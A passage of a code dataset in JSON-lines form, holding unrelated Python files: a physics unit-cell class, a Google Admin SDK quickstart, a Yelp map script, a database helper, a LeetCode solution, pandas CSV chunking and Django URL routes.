0))\n self.lin_therm_exp, self.lin_therm_exp_str = self.check_cell_array_input(\n kwargs.get('lin_therm_exp', 0))\n self.sub_system_coupling, self.sub_system_coupling_str = self.check_cell_array_input(\n kwargs.get('sub_system_coupling', 0))\n\n if (len(self.heat_capacity) == len(self.therm_cond)\n and len(self.heat_capacity) == len(self.lin_therm_exp)\n and len(self.heat_capacity) == len(self.sub_system_coupling)):\n self.num_sub_systems = len(self.heat_capacity)\n else:\n raise ValueError('Heat capacity, thermal conductivity, linear'\n 'thermal expansion and subsystem coupling have not'\n 'the same number of elements!')\n\n self.area = self.a_axis * self.b_axis\n self.volume = self.area * self.c_axis\n\n def __str__(self):\n \"\"\"String representation of this class\"\"\"\n output = [['id', self.id],\n ['name', self.name],\n ['a-axis', '{:.4~P}'.format(self.a_axis)],\n ['b-axis', '{:.4~P}'.format(self.b_axis)],\n ['c-axis', '{:.4~P}'.format(self.c_axis)],\n ['area', '{:.4~P}'.format(self.area.to('nm**2'))],\n ['volume', '{:.4~P}'.format(self.volume.to('nm**3'))],\n ['mass', '{:.4~P}'.format(self.mass)],\n ['density', '{:.4~P}'.format(self.density.to('kg/meter**3'))],\n ['Debye Waller Factor', self.deb_wal_fac.to('meter**2')],\n ['sound velocity', '{:.4~P}'.format(self.sound_vel.to('meter/s'))],\n ['spring constant', self.spring_const * u.kg/u.s**2],\n ['phonon damping', self.phonon_damping.to('kg/s')],\n ['opt. pen. depth', self.opt_pen_depth.to('nm')],\n ['opt. refractive index', self.opt_ref_index],\n ['opt. ref. 
index/strain', self.opt_ref_index_per_strain],\n ['thermal conduct.', ' W/(m K)\\n'.join(self.therm_cond_str) + ' W/(m K)'],\n ['linear thermal expansion', '\\n'.join(self.lin_therm_exp_str)],\n ['heat capacity', ' J/(kg K)\\n'.join(self.heat_capacity_str) + ' J/(kg K)'],\n ['subsystem coupling', ' W/m³\\n'.join(self.sub_system_coupling_str) + ' W/m³']]\n\n class_str = 'Unit Cell with the following properties\\n\\n'\n class_str += tabulate(output, headers=['parameter', 'value'], tablefmt=\"rst\",\n colalign=('right',), floatfmt=('.2f', '.2f'))\n class_str += '\\n\\n' + str(self.num_atoms) + ' Constituents:\\n'\n\n atoms_str = []\n for i in range(self.num_atoms):\n atoms_str.append([self.atoms[i][0].name,\n '{:0.2f}'.format(self.atoms[i][1](0)),\n self.atoms[i][2]])\n class_str += tabulate(atoms_str, headers=['atom', 'position', 'position function'],\n tablefmt=\"rst\")\n return class_str\n\n def clone_2_multiple(self, N, *args):\n \"\"\"clone_2_multiple\"\"\"\n# %% clone2multiple\n# % Returns a cloned unit cell N time repeated. Accordingly, all\n# % physical properties are adapted, *despite of any specific function\n# % handle of the atomic position in the unit cell and higher orders\n# % of spring constants!*\n# % If no _ID_ or _name_ is given for the cloned unit cell, the name\n# % of the current unit cell is taken plus $N$.\n# function clone = clone2multiple(obj,N,varargin)\n# % initialize input parser and define defaults and validators\n# p = inputParser;\n# p.addRequired('N' , @isnumeric);\n# p.addParamValue('ID' , [obj.ID num2str(N)] , @ischar);\n# p.addParamValue('name' , [obj.name num2str(N)] , @ischar);\n# % parse the input\n# p.parse(N,varargin{:});\n# % assign parser results\n# N = p.Results.N;\n# newID = p.Results.ID;\n# newName = p.Results.name;\n# % initialize the cloned object with required inputs\n# clone = unitCell(obj.ID,obj.name,obj.cAxis);\n# % copy all properties from the current to the cloned object\n# props = properties(obj);\n# for i = 1:length(props)\n# clone.(props{i}) = obj.(props{i});\n# end%for\n# % reset some _N_-dependent properties\n# clone.ID = newID;\n# clone.name = newName;\n# clone.cAxis = N*obj.cAxis;\n# clone.volume = N*obj.volume;\n# % reset all atom-dependent properties\n# clone.atoms = {};\n# clone.mass = 0;\n# clone.density = 0;\n# clone.springConst = 0;\n# clone.numAtoms = 0;\n# % add all atoms to cloned unit cell, but the position handle is\n# % transfered!\n# for i = 0:N-1\n# for j = 1:obj.numAtoms\n# clone.addAtom(obj.atoms{j,1},obj.atoms{j,2}(0)/N+i/N);\n# end%for\n# end%for\n# end%function\n pass\n\n def visualize(self, **kwargs):\n \"\"\"visualize\n\n Allows for 3D presentation of unit cell by allow for a & b\n coordinate of atoms.\n Also add magnetization per atom.\n\n Todo: use the avogadro project as plugin\n Todo: create unit cell from CIF file e.g. 
by xrayutilities\n plugin.\n\n \"\"\"\n import matplotlib.pyplot as plt\n import matplotlib.cm as cmx\n\n strains = kwargs.get('strains', 0)\n if not isinstance(strains, np.ndarray):\n strains = np.array([strains])\n\n colors = [cmx.Dark2(x) for x in np.linspace(0, 1, self.num_atoms)]\n atom_ids = self.get_atom_ids()\n\n for strain in strains:\n plt.figure()\n atoms_plotted = np.zeros_like(atom_ids)\n for j in range(self.num_atoms):\n if not atoms_plotted[atom_ids.index(self.atoms[j][0].id)]:\n label = self.atoms[j][0].id\n atoms_plotted[atom_ids.index(self.atoms[j][0].id)] = True\n plt.plot(1+j, self.atoms[j][1](strain), 'o',\n MarkerSize=10,\n markeredgecolor=[0, 0, 0],\n markerfaceColor=colors[atom_ids.index(self.atoms[j][0].id)],\n label=label)\n else:\n label = '_nolegend_'\n plt.plot(1+j, self.atoms[j][1](strain), 'o',\n MarkerSize=10,\n markeredgecolor=[0, 0, 0],\n markerfaceColor=colors[atom_ids.index(self.atoms[j][0].id)],\n label=label)\n\n plt.axis([0.1, self.num_atoms+0.9, -0.1, (1.1+np.max(strains))])\n plt.grid(True)\n\n plt.title('Strain: {:0.2f}%'.format(strain))\n plt.ylabel('relative Position')\n plt.xlabel('# Atoms')\n plt.legend()\n plt.show()\n\n def get_property_dict(self, **kwargs):\n \"\"\"get_property_dict\n\n Returns a dictionary with all parameters. objects or dicts and\n objects are converted to strings. if a type is given, only these\n properties are returned.\n\n \"\"\"\n # initialize input parser and define defaults and validators\n types = ['all', 'heat', 'phonon', 'xray', 'optical']\n properties_by_types = {'heat': ['_c_axis', '_area', '_volume', '_opt_pen_depth',\n 'therm_cond_str', 'heat_capacity_str',\n 'int_heat_capacity_str', 'sub_system_coupling_str',\n 'num_sub_systems'],\n 'phonon': ['num_sub_systems', 'int_lin_therm_exp_str', '_c_axis',\n '_mass', '_spring_const', '_phonon_damping'],\n 'xray': ['num_atoms', '_area', '_deb_wal_fac', '_c_axis'],\n 'optical': ['_c_axis', '_opt_pen_depth', 'opt_ref_index',\n 'opt_ref_index_per_strain'],\n }\n\n types = kwargs.get('types', 'all')\n attrs = vars(self)\n # define the property names by the given type\n if types == 'all':\n S = attrs\n else:\n S = dict((key, value) for key, value in attrs.items()\n if key in properties_by_types[types])\n\n return S\n\n def check_cell_array_input(self, inputs):\n \"\"\" check_cell_array_input\n\n Checks the input for inputs which are cell arrays of function\n handles, such as the heat capacity which is a cell array of N\n function handles.\n\n \"\"\"\n output = []\n outputStrs = []\n # if the input is not a list, we convert it to one\n if not isinstance(inputs, list):\n inputs = [inputs]\n # traverse each list element and convert it to a function handle\n for input in inputs:\n if isfunction(input):\n raise ValueError('Please use string representation of function!')\n output.append(input)\n outputStrs.append('no str representation available')\n elif isinstance(input, str):\n try:\n output.append(eval(input))\n outputStrs.append(input)\n except Exception as e:\n print('String input for unit cell property ' + input + ' \\\n cannot be converted to function handle!')\n print(e)\n elif isinstance(input, (int, float)):\n output.append(eval('lambda T: {:f}'.format(input)))\n outputStrs.append('lambda T: {:f}'.format(input))\n elif isinstance(input, object):\n output.append(eval('lambda T: {:f}'.format(input.to_base_units().magnitude)))\n outputStrs.append('lambda T: {:f}'.format(input.to_base_units().magnitude))\n else:\n raise ValueError('Unit cell property input has to be a 
single or '\n 'cell array of numerics, function handles or strings which can be'\n 'converted into a function handle!')\n\n return(output, outputStrs)\n\n @property\n def int_heat_capacity(self):\n \"\"\"get int_heat_capacity\n\n Returns the anti-derrivative of the temperature-dependent heat\n :math:`c(T)` capacity function. If the int_heat_capacity\n property is not set, the symbolic integration is performed.\n\n \"\"\"\n if hasattr(self, '_int_heat_capacity') and isinstance(self._int_heat_capacity, list):\n return self._int_heat_capacity\n else:\n self._int_heat_capacity = []\n self.int_heat_capacity_str = []\n try:\n T = Symbol('T')\n for i, hcs in enumerate(self.heat_capacity_str):\n integral = integrate(hcs.split(':')[1], T)\n self._int_heat_capacity.append(lambdify(T, integral))\n self.int_heat_capacity_str.append('lambda T : ' + str(integral))\n\n except Exception as e:\n print('The sympy integration did not work. You can set the'\n 'analytical anti-derivative of the heat capacity'\n 'of your unit cells as lambda function of the temperature'\n 'T by typing UC.int_heat_capacity = lambda T: c(T)'\n 'where UC is the name of the unit cell object.')\n print(e)\n\n return self._int_heat_capacity\n\n @int_heat_capacity.setter\n def int_heat_capacity(self, int_heat_capacity):\n \"\"\"set int_heat_capacity\n\n Set the integrated heat capacity manually when no sympy is\n installed.\n\n \"\"\"\n self._int_heat_capacity, self.int_heat_capacity_str = self.check_cell_array_input(\n int_heat_capacity)\n\n @property\n def int_lin_therm_exp(self):\n \"\"\"get int_lin_therm_exp\n\n Returns the anti-derrivative of the integrated\n temperature-dependent linear thermal expansion function. If the\n int_lin_therm_exp property is not set, the symbolic integration\n is performed.\n\n \"\"\"\n\n if hasattr(self, '_int_lin_therm_exp') and isinstance(self._int_lin_therm_exp, list):\n return self._int_lin_therm_exp\n else:\n self._int_lin_therm_exp = []\n self.int_lin_therm_exp_str = []\n try:\n T = Symbol('T')\n for i, ltes in enumerate(self.lin_therm_exp_str):\n integral = integrate(ltes.split(':')[1], T)\n self._int_lin_therm_exp.append(lambdify(T, integral))\n self.int_lin_therm_exp_str.append('lambda T : ' + str(integral))\n\n except Exception as e:\n print('The sympy integration did not work. You can set the'\n 'the analytical anti-derivative of the heat capacity'\n 'of your unit cells as lambda function of the temperature'\n 'T by typing UC.int_heat_capacity = lambda T: c(T)'\n 'where UC is the name of the unit cell object.')\n print(e)\n\n return self._int_lin_therm_exp\n\n @int_lin_therm_exp.setter\n def int_lin_therm_exp(self, int_lin_therm_exp):\n \"\"\"set int_lin_therm_exp\n\n Set the integrated linear thermal expansion coefficient manually\n when no sympy installed.\n\n \"\"\"\n self._int_lin_therm_exp, self.int_lin_therm_exp_str = self.check_cell_array_input(\n int_lin_therm_exp)\n\n def add_atom(self, atom, position):\n \"\"\" add_atom\n\n Adds an atomBase/atomMixed at a relative position of the unit\n cell.\n\n Update the mass, density and spring constant of the unit cell\n automatically:\n\n .. 
math:: \\kappa = m \\cdot (v_s / c)^2\n\n \"\"\"\n position_str = ''\n # test the input type of the position\n if isfunction(position):\n raise ValueError('Please use string representation of function!')\n pass\n elif isinstance(position, str):\n try:\n position_str = position\n position = eval(position)\n except Exception as e:\n print('String input for unit cell property ' + position + ' \\\n cannot be converted to function handle!')\n print(e)\n elif isinstance(position, (int, float)):\n position_str = 'lambda strain: {:e}*(strain+1)'.format(position)\n position = eval(position_str)\n else:\n raise ValueError('Atom position input has to be a scalar, or string'\n 'which can be converted into a lambda function!')\n\n # add the atom at the end of the array\n self.atoms.append([atom, position, position_str])\n # increase the number of atoms\n self.num_atoms = self.num_atoms + 1\n\n self.mass = 0*u.kg\n for i in range(self.num_atoms):\n self.mass = self.mass + self.atoms[i][0].mass\n\n self.density = self.mass / self.volume\n # set mass per unit area (do not know if necessary)\n self.mass = self.mass * 1*u.angstrom**2 / self.area\n self.calc_spring_const()\n\n def add_multiple_atoms(self, atom, position, Nb):\n \"\"\"add_multiple_atoms\n\n Adds multiple atomBase/atomMixed at a relative position of the\n unit cell.\n\n \"\"\"\n for i in range(Nb):\n self.addAtom(atom, position)\n\n def calc_spring_const(self):\n \"\"\"calc_spring_const\n\n Calculates the spring constant of the unit cell from the mass,\n sound velocity and c-axis\n\n .. math:: k = m \\, \\left(\\\\frac{v}{c}\\\\right)^2\n\n \"\"\"\n self.spring_const[0] = (self._mass * (self._sound_vel/self._c_axis)**2)\n\n def get_acoustic_impedance(self):\n \"\"\"get_acoustic_impedance\"\"\"\n Z = np.sqrt(self.spring_const[0] * self.mass/self.area**2)\n return Z\n\n def set_ho_spring_constants(self, HO):\n \"\"\"set_ho_spring_constants\n\n Set the higher orders of the spring constant for anharmonic\n phonon simulations.\n\n \"\"\"\n # reset old higher order spring constants\n self.spring_const = np.delete(self.spring_const, np.r_[1:len(self.spring_const)])\n self.spring_const = np.hstack((self.spring_const, HO))\n\n def get_atom_ids(self):\n \"\"\"get_atom_ids\n\n Returns a cell array of all atom ids in the unit cell.\n\n \"\"\"\n ids = []\n for i in range(self.num_atoms):\n if not self.atoms[i][0].id in ids:\n ids.append(self.atoms[i][0].id)\n\n return ids\n\n def get_atom_positions(self, *args):\n \"\"\"get_atom_positions\n\n Returns a vector of all relative postion of the atoms in the\n unit cell.\n\n \"\"\"\n if args:\n strain = args[0]\n else:\n strain = 0\n\n res = np.zeros([self.num_atoms])\n for i, atom in enumerate(self.atoms):\n res[i] = atom[1](strain)\n\n return res\n\n @property\n def a_axis(self):\n \"\"\"float: in-plane a-axis [m]\"\"\"\n return Q_(self._a_axis, u.meter).to('nm')\n\n @a_axis.setter\n def a_axis(self, a_axis):\n \"\"\"set.a_axis\"\"\"\n self._a_axis = a_axis.to_base_units().magnitude\n\n @property\n def b_axis(self):\n \"\"\"float: in-plane b-axis [m]\"\"\"\n return Q_(self._b_axis, u.meter).to('nm')\n\n @b_axis.setter\n def b_axis(self, b_axis):\n \"\"\"set.a_axis\"\"\"\n self._b_axis = b_axis.to_base_units().magnitude\n\n @property\n def c_axis(self):\n \"\"\"float: out-of-plane c-axis [m]\"\"\"\n return Q_(self._c_axis, u.meter).to('nm')\n\n @c_axis.setter\n def c_axis(self, c_axis):\n \"\"\"set.c_axis\"\"\"\n self._c_axis = c_axis.to_base_units().magnitude\n\n @property\n def mass(self):\n \"\"\"float: mass 
of unit cell normalized to area of 1 Ų [kg]\"\"\"\n return Q_(self._mass, u.kg)\n\n @mass.setter\n def mass(self, mass):\n \"\"\"set.mass\"\"\"\n self._mass = mass.to_base_units().magnitude\n\n @property\n def density(self):\n \"\"\"float: density of the unitCell [kg/m³]\"\"\"\n return Q_(self._density, u.kg/u.m**3)\n\n @density.setter\n def density(self, density):\n \"\"\"set.density\"\"\"\n self._density = density.to_base_units().magnitude\n\n @property\n def area(self):\n \"\"\"\n float: area of epitaxial unit cells need for normation for\n correct intensities) [m²]\n\n \"\"\"\n return Q_(self._area, u.m**2)\n\n @area.setter\n def area(self, area):\n \"\"\"set.area\"\"\"\n self._area = area.to_base_units().magnitude\n\n @property\n def volume(self):\n \"\"\"float: volume of unit cell [m³]\"\"\"\n return Q_(self._volume, u.m**3)\n\n @volume.setter\n def volume(self, volume):\n \"\"\"set.volume\"\"\"\n self._volume = volume.to_base_units().magnitude\n\n @property\n def deb_wal_fac(self):\n \"\"\"float: Debye-Waller factor [m²]\"\"\"\n return Q_(self._deb_wal_fac, u.m**2)\n\n @deb_wal_fac.setter\n def deb_wal_fac(self, deb_wal_fac):\n \"\"\"set.deb_wal_fac\"\"\"\n self._deb_wal_fac = deb_wal_fac.to_base_units().magnitude\n\n @property\n def sound_vel(self):\n \"\"\"float: sound velocity in the unit cell [m/s]\"\"\"\n return Q_(self._sound_vel, u.m/u.s)\n\n @sound_vel.setter\n def sound_vel(self, sound_vel):\n \"\"\"set.sound_vel\n If the sound velocity is set, the spring constant is\n (re)calculated.\n \"\"\"\n self._sound_vel = sound_vel.to_base_units().magnitude\n self.calc_spring_const()\n\n @property\n def phonon_damping(self):\n \"\"\"float: damping constant of phonon propagation [kg/s]\"\"\"\n return Q_(self._phonon_damping, u.kg/u.s)\n\n @phonon_damping.setter\n def phonon_damping(self, phonon_damping):\n \"\"\"set.phonon_damping\"\"\"\n self._phonon_damping = phonon_damping.to_base_units().magnitude\n\n @property\n def opt_pen_depth(self):\n \"\"\"\n float: penetration depth for pump always for 1st subsystem\n light in the unit cell [m]\n\n \"\"\"\n return Q_(self._opt_pen_depth, u.meter).to('nanometer')\n\n @opt_pen_depth.setter\n def opt_pen_depth(self, opt_pen_depth):\n \"\"\"set.opt_pen_depth\"\"\"\n self._opt_pen_depth = opt_pen_depth.to_base_units().magnitude\n","sub_path":"udkm1Dsim/unitCell.py","file_name":"unitCell.py","file_ext":"py","file_size_in_byte":25467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"285201203","text":"\n\n#calss header\nclass _BEATITUDES():\n\tdef __init__(self,): \n\t\tself.name = \"BEATITUDES\"\n\t\tself.definitions = [u'in the Bible, a group of statements made by Jesus: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_beatitudes.py","file_name":"_beatitudes.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"122844773","text":"from oauth2client.service_account import ServiceAccountCredentials\nfrom apiclient.discovery import build\nimport json\nfrom httplib2 import Http\n\nscopes = ['https://www.googleapis.com/auth/admin.directory.group.member',\n 'https://www.googleapis.com/auth/admin.directory.group.member.readonly',\n 'https://www.googleapis.com/auth/admin.directory.group',\n 
'https://www.googleapis.com/auth/admin.directory.group.readonly']\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(\n 'HvZtesting-ac06c2b07d6e.json',\n scopes=scopes\n )\n\n# Use this sub email as the subject to delegate on behalf of that user\naccount_sub = 'ctan@g.hmc.edu'\n\ndelegate_credentials = credentials.create_delegated(account_sub)\n\nhttp = delegate_credentials.authorize(Http())\n\ndirectory = build('admin', 'directory_v1', http=http)\n\nresponse = directory.groups().get(groupKey = \"hvztesting-l@g.hmc.edu\")\n# print(response.to_json())","sub_path":"googleGroup/adminsdk/quickstart.py","file_name":"quickstart.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"209194678","text":"from maps import *\nimport sys\nfrom PIL import Image, ImageDraw\nfrom yelpdata import *\n\ndef draw_options(term,location,yelp):\n maps(location,yelp)\n maps_legend(location,yelp)\n\n #Source: https://www.daniweb.com/programming/software-development/threads/83718/paste-a-image-into-another\n im = Image.new(\"RGB\", (1000,640), (220,20,60))\n icon = Image.open(\"maps.png\")\n x, y = icon.size\n im.paste(icon, (0,0,x,y))\n icon1 = Image.open(\"maps_legend.png\")\n x1, y1 = icon1.size\n im.paste(icon1, (650,20,x1+650,y1+20))\n im.save(\"options.png\",\"PNG\")\n\ndef draw_distance(term,location,yelp):\n best_location(location,yelp)\n best_location_legend(location,yelp)\n\n #Source: https://www.daniweb.com/programming/software-development/threads/83718/paste-a-image-into-another\n im = Image.new(\"RGB\", (640,640), \"white\")\n icon = Image.open(\"best_location.png\")\n icon1 = Image.open(\"best_location_legend.png\")\n x, y = icon.size\n x1, y1 = icon1.size\n im.paste(icon, (0,0,x,y))\n im.paste(icon1, (350,500,x1+350,y1+500))\n im.save(\"closest.png\")\n\ndef usage():\n print('This python program takes \\'options\\' or \\'closest\\' as a first argument,')\n print('then the search term as a second argument, and address/location in')\n print('NYC as the rest of the arguments')\n\nif __name__=='__main__':\n\n if len(sys.argv) < 4:\n usage()\n sys.exit(1)\n\n map_type = sys.argv[1]\n term = sys.argv[2]\n location = sys.argv[3:]\n\n yelp = YelpData()\n yelp.get_results(term,location)\n\n if sys.argv[1] == 'closest':\n draw_distance(term,location,yelp)\n elif sys.argv[1] == 'options':\n draw_options(term,location,yelp)\n else:\n usage()\n sys.exit(1)\n","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"222676576","text":"import json\nfrom collections import OrderedDict\nfrom gen_spec import Encoder,Node,Stream\n\nblend=OrderedDict()\nnodes=[]\nnodes.append(Node(name=\"decode_0\", stage=\"decode\", delivery_function=None, config=None, lambda_function=None))\nnodes.append(Node(name=\"decode_1\", stage=\"decode\", delivery_function=None, config=None, lambda_function=None))\nnodes.append(Node(name=\"blend\", stage=\"blend\", delivery_function=\"pair_delivery_func\", config=None, lambda_function=None))\nnodes.append(Node(name=\"encode\", stage=\"encode_to_dash\", delivery_function=None, config=None, lambda_function=None))\nblend[\"nodes\"]=nodes\nstreams=[]\nstreams.append(Stream(src=\"input_0:chunks\", dst=\"decode_0:chunks\"))\nstreams.append(Stream(src=\"input_1:chunks\", dst=\"decode_1:chunks\"))\nstreams.append(Stream(src=\"decode_0:frames\", 
dst=\"blend:frames_0\"))\nstreams.append(Stream(src=\"decode_1:frames\", dst=\"blend:frames_1\"))\nstreams.append(Stream(src=\"blend:frames\", dst=\"encode:frames\"))\nstreams.append(Stream(src=\"encode:chunks\", dst=\"output_0:chunks\"))\nblend[\"streams\"]=streams\nwith open('blend.json', 'w') as f:\n json.dump(blend, f, indent=2, cls=Encoder)\n","sub_path":"pipespec/gen_blend.py","file_name":"gen_blend.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"307735167","text":"import logging\nfrom typing import Generator\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nfrom opennem.exporter.encoders import opennem_deserialize, opennem_serialize\nfrom opennem.settings import settings\n\nDeclarativeBase = declarative_base()\n\nlogger = logging.getLogger(__name__)\n\n\ndef db_connect(db_name=None, debug=False):\n \"\"\"\n Performs database connection using database settings from settings.py.\n\n Returns sqlalchemy engine instance\n \"\"\"\n db_conn_str = settings.db_url\n\n connect_args = {}\n\n if db_conn_str.startswith(\"sqlite\"):\n connect_args = {\"check_same_thread\": False}\n\n try:\n return create_engine(\n db_conn_str,\n json_serializer=opennem_serialize,\n json_deserializer=opennem_deserialize,\n echo=debug,\n pool_size=10,\n pool_timeout=60,\n connect_args=connect_args,\n )\n except Exception as exc:\n logger.error(\"Could not connect to database: %s\", exc)\n\n\nengine = db_connect()\nSessionLocal = sessionmaker(bind=engine, autocommit=False, autoflush=False,)\n\n\ndef get_database_session() -> Generator:\n \"\"\"\n Gets a database session\n\n \"\"\"\n try:\n s = SessionLocal()\n yield s\n except Exception as e:\n raise e\n finally:\n s.close()\n\n\ndef get_database_engine():\n \"\"\"\n Gets a database engine connection\n\n \"\"\"\n return engine\n","sub_path":"opennem/db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"419651999","text":"\"\"\"\n113. 
Path Sum II\nGiven a binary tree and a sum, find all root-to-leaf paths where each path's sum equals the given sum.\n\nFor example:\nGiven the below binary tree and sum = 22,\n 5\n / \\\n 4 8\n / / \\\n 11 13 4\n / \\ / \\\n 7 2 5 1\nreturn\n[\n [5,4,11,2],\n [5,8,4,5]\n]\n\"\"\"\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def pathSum(self, root, sumVal):\n \"\"\"\n :type root: TreeNode\n :type sum: int\n :rtype: List[List[int]]\n \"\"\"\n if root == None: return []\n if root.left == None and root.right == None:\n if root.val == sumVal:\n return [[root.val]]\n else:\n return []\n result = self.pathSum(root.left, sumVal- root.val) + self.pathSum(root.right,sumVal - root.val)\n return [[root.val]+x for x in result]\n \n# Note: I think this is not an efficient method, please see another file","sub_path":"TreeSummation/pathSumII_0.py","file_name":"pathSumII_0.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"106618333","text":"import pandas as pd\r\n\r\n# read big\r\n# https://stackoverflow.com/a/25962187/10064174\r\nwith pd.read_csv(\"C:/REPOSITORIES/MyRepo/PYTHON/python_big_files_handling_web_scraping/sample.csv\", chunksize=2) as reader:\r\n for chunk in reader:\r\n print(chunk)\r\n\r\n\r\n# write big\r\n# https://stackoverflow.com/a/38531304/10064174\r\ndef get_chunk():\r\n yield pd.DataFrame({\"a\": [1,2], \"b\": [11,22], \"c\": [111,222]})\r\n yield pd.DataFrame({\"a\": [3,4], \"b\": [33,44], \"c\": [333,444]})\r\n yield pd.DataFrame({\"a\": [5], \"b\": [55], \"c\": [555]})\r\n\r\n\r\nheader = True\r\nfor chunk in get_chunk():\r\n chunk.to_csv(\"C:/REPOSITORIES/MyRepo/.trash/output.csv\", mode=\"a\", index=False,header=header)\r\n header=False","sub_path":"python/python_data_handling/001_csv.py","file_name":"001_csv.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"154276668","text":"# -*- coding: utf-8 -*-\n\n# pyKol - Gestion de colles en CPGE\n# Copyright (c) 2018 Florian Hatat\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\nfrom django.conf.urls import url\nfrom django.urls import path, include\n\nfrom . 
import views\n\ncolles_urlpatterns = [\n\tpath('', views.colles.colle_list, name='colle_list'),\n\tpath('a_noter/', views.colles.colle_a_noter_list, name=\"colles_a_noter\"),\n\tpath('/', views.colles.colle_detail, name='colle_detail'),\n\tpath('/noter', views.colles.colle_declarer, name='colle_declarer'),\n\tpath('/supprimer', views.colles.colle_supprimer, name='colle_supprimer'),\n\tpath('/annuler', views.colles.colle_annuler, name='colle_annuler'),\n\tpath('/deplacer', views.colles.colle_deplacer, name='colle_deplacer'),\n\tpath('/roulement/creer', views.colloscope.roulement_creer, name='roulement_creer'),\n]\n\ncolloscopes_urlpatterns = [\n\tpath('', views.colles.colloscope_home, name='colloscope_home'),\n\tpath('/', views.colloscope.colloscope, name='colloscope'),\n\tpath('/trinomes', views.colloscope.trinomes, name='colloscope_trinomes'),\n\tpath('/semaines', views.colloscope.semaines, name='colloscope_semaines'),\n\tpath('/creneaux', views.colles.creneaux, name='colloscope_creneaux'),\n\tpath('/colle_creer', views.colles.colle_creer, name='colle_creer'),\n\tpath('/import_odf', views.colloscope.import_odf, name='colloscope_import_odf'),\n\tpath('roulement/', views.colloscope.roulement_editer, name='roulement_editer'),\n\tpath('roulement//application_creer', views.colloscope.roulement_application_creer, name='roulement_application_creer'),\n\tpath('roulement/application//', views.colloscope.roulement_application_editer, name='roulement_application_editer'),\n\tpath('roulement/application//generer', views.colloscope.roulement_generer_colles, name='roulement_generer_colles'),\n]\n\ndirection_urlpatterns = [\n\tpath('import_bee/', views.direction.import_bee, name='import_bee'),\n\tpath('import_colleurs/', views.direction.import_colleurs_odf, name='import_colleurs'),\n\tpath('creneaux/', views.colles.creneau_list_direction, name='creneau_list_direction'),\n\tpath('reservations_ponctuelles/', views.direction.reservations_ponctuelles, name='reservations_ponctuelles'),\n]\n\nannees_urlpatterns = [\n\tpath('', views.direction.AnneeListView.as_view(), name='annee_list'),\n\tpath('/', views.direction.annee_detail, name='annee_detail'),\n\t# path('/supprimer', views.direction.annee_supprimer, name='annee_supprimer'),\n]\n\nclasses_urlpatterns = [\n\tpath('', views.ClasseListView.as_view(), name=\"classe_list\"),\n\tpath('/', views.ClasseDetailView.as_view(), name='classe_detail'),\n\tpath('/resultats', views.colles.classe_resultats, name='classe_colle_resultats'),\n]\n\netudiants_urlpatterns = [\n path('/', views.EtudiantDetailView.as_view(), name='etudiant'),\n]\n\naccounts_urlpatterns = [\n\tpath('', views.direction.DirectionListUser.as_view(), name='direction_list_user'),\n\tpath('profile/', views.mon_profil, name='mon_profil'),\n\tpath('create/', views.direction.direction_create_user, name='direction_create_user'),\n\tpath('edit//', views.direction.direction_edit_user, name='direction_edit_user'),\n\tpath('delete//', views.direction.direction_delete_user, name='direction_delete_user'),\n\tpath('', include('django.contrib.auth.urls')),\n]\n\nreleves_urlpatterns = [\n\tpath('', views.direction.releve_dispatch, name='releve_list'),\n\tpath('creer/', views.direction.releve_creer, name='releve_creer'),\n\tpath('/', views.direction.ReleveDetailView.as_view(), name='releve_detail'),\n\tpath('/payer/', views.direction.releveligne_payer, name='releveligne_payer'),\n]\n\ntrinomes_urlpatterns = [\n\tpath('/', views.colloscope.trinome_detail, name='trinome_detail'),\n\tpath('/supprimer', 
views.colloscope.trinome_supprimer, name='trinome_supprimer'),\n]\n\nurlpatterns = [\n\tpath('', views.home, name='home'),\n\tpath('about/', views.mentions_legales, name='mentions_legales'),\n\tpath('accounts/', include(accounts_urlpatterns)),\n\tpath('colles/', include(colles_urlpatterns)),\n\tpath('colloscopes/', include(colloscopes_urlpatterns)),\n\tpath('direction/', include(direction_urlpatterns)),\n\tpath('annees/', include(annees_urlpatterns)),\n\tpath('classes/', include(classes_urlpatterns)),\n\tpath('etudiant/', include(etudiants_urlpatterns)),\n\tpath('releves/', include(releves_urlpatterns)),\n\tpath('trinomes/', include(trinomes_urlpatterns)),\n]\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"19376683","text":"import math\r\n\r\n# Import the datetime module so that\r\n# it can be used in this program.\r\nfrom datetime import datetime\r\n\r\n# Call 